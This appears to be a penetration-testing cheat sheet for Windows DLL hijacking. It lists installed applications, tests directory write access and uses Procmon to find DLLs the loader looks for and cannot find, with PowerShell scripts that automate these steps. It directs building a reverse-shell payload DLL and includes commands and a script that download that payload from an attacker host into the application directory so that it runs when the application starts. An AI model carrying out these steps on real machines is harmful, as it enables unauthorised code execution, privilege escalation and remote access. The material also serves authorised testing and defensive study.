DLL Hijacking

1. Get all installed applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

NOTE: The Wow6432Node key only lists 32-bit applications on a 64-bit system. Query the same Uninstall path without Wow6432Node as well to see the 64-bit applications.
2. Research

Search for each application name together with "DLL hijacking" to find out whether it is known to be vulnerable, which DLL name it looks for, and which directory it loads it from.

3. Check whether you can write to the application directory

echo "test" > '<Application File Path>\test.txt'
type '<Application File Path>\test.txt'

If the file is created and can be read back, the directory is writable by the current user. Delete the test file afterwards.
4. Open Procmon.exe

NOTE: Procmon requires administrative rights. If you do not have them on the target, copy the suspected application to a machine where you are an administrator and analyse it there.

5. Apply filters

Apply the following filters:

Column       | Relation | Value              | Action
Process Name | is       | <Application Name> | Include
Operation    | is       | CreateFile         | Include
Path         | contains | <DLL File Name>    | Include

If you do not yet know which DLL to look for, filter on Result is NAME NOT FOUND and Path ends with .dll instead. Every remaining event is a DLL the application searched for and failed to find, listed in search order; the first search location you can write to is the hijack target.
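The Procmon step driven from the command line, as an added example that is not part of the original page: it captures the application start on the analysis machine, exports the log to CSV and applies the same filters as the GUI, plus Result is NAME NOT FOUND, so only DLLs that were searched for and not found are listed. The Procmon location and the application path C:\Analysis\App\target.exe are assumptions; replace them with your own.

```powershell
# Added example, not from the original page. Assumes Procmon.exe is in the current
# directory and the copied application is C:\Analysis\App\target.exe (both assumed).
$Procmon = '.\Procmon.exe'
$Target  = 'C:\Analysis\App\target.exe'
$Log     = Join-Path $env:TEMP 'dllhijack.pml'
$Csv     = Join-Path $env:TEMP 'dllhijack.csv'

# Start capturing to a backing file, run the application long enough to load its
# DLLs, then stop the capture.
Start-Process $Procmon -ArgumentList '/AcceptEula', '/Quiet', '/Minimized', "/BackingFile `"$Log`""
Start-Sleep -Seconds 5
$app = Start-Process $Target -PassThru
Start-Sleep -Seconds 20
Stop-Process -Id $app.Id -ErrorAction SilentlyContinue
Start-Process $Procmon -ArgumentList '/Terminate' -Wait

# Export the PML log to CSV. With Procmon's default column set the CSV header is
# "Time of Day","Process Name","PID","Operation","Path","Result","Detail".
Start-Process $Procmon -ArgumentList '/AcceptEula', '/Quiet', "/OpenLog `"$Log`"", "/SaveAs `"$Csv`"" -Wait

# Same filters as the GUI table, plus Result is NAME NOT FOUND: keep only CreateFile
# events from the target process for .dll paths that did not exist.
$exe = Split-Path $Target -Leaf
$missing = Import-Csv -Path $Csv |
    Where-Object {
        $_.'Process Name' -eq $exe -and
        $_.Operation -eq 'CreateFile' -and
        $_.Result -eq 'NAME NOT FOUND' -and
        $_.Path -like '*.dll'
    } |
    Select-Object -ExpandProperty Path -Unique

# Group by DLL name so each missing DLL shows every directory that was probed for it,
# in the order the loader searched them.
$missing |
    Group-Object { Split-Path $_ -Leaf } |
    ForEach-Object {
        "{0}:" -f $_.Name
        $_.Group | ForEach-Object { "    $_" }
    }
```

The directories printed under each DLL name are the candidates for step 3: a DLL that is only ever found in System32 is not hijackable, whereas one that is first probed in the application directory (or in another directory on the search path that a low-privileged user can write to) is.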

6. Craft a payload DLL that returns a reverse shell

The DLL must be built for the same architecture as the target application (32-bit or 64-bit) and must use exactly the file name the application searches for.

7. Download the payload onto the target machine

iwr -uri http://<Kali IP Address>/<DLL File Name>.dll -Outfile '<Application File Path>\<DLL File Name>.dll'

Start your listener first, then start (or restart) the application so it loads the planted DLL.
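The target-side steps (1, 3 and 7) combined into one script, as an added example that is not part of the original page. It enumerates both uninstall hives, checks writability with a probe file that is removed again, and only stages the payload when the directory is writable and the DLL is genuinely missing. The attacker URL, DLL name and application directory are placeholders.

```powershell
# Added example, not from the original page. All three values below are assumptions.
$AttackerUrl = 'http://10.10.14.5/hijack.dll'        # assumed Kali web server and file
$DllName     = 'hijack.dll'                          # assumed name the application searches for
$AppDir      = 'C:\Program Files (x86)\VulnApp'      # assumed candidate directory from Procmon

# Step 1: list installed applications from the 32-bit and 64-bit uninstall hives.
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)
$apps = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
    Where-Object { $_.DisplayName } |
    Select-Object DisplayName, DisplayVersion, InstallLocation |
    Sort-Object DisplayName -Unique
$apps | Format-Table -AutoSize

# Step 3: writability check that cleans up after itself and distinguishes
# "no write access" from "directory does not exist".
function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ("probe_{0}.tmp" -f [guid]::NewGuid())
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# Step 7: stage the payload only if the directory is writable and the DLL is absent.
# Overwriting an existing DLL is a different, noisier technique and may break the app.
$dest = Join-Path $AppDir $DllName
if (-not (Test-DirectoryWritable -Path $AppDir)) {
    Write-Warning "$AppDir is not writable by $env:USERNAME; pick another search location."
} elseif (Test-Path -LiteralPath $dest) {
    Write-Warning "$dest already exists; this is not a missing-DLL hijack."
} else {
    Invoke-WebRequest -Uri $AttackerUrl -OutFile $dest -UseBasicParsing
    Get-Item -LiteralPath $dest | Select-Object FullName, Length
    # Start the listener before launching the application so the callback is caught.
}
```

If you would rather not create files while probing, icacls on the directory shows the same thing: an entry for BUILTIN\Users or Authenticated Users with (W), (M) or (F) means a low-privileged user can write there.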
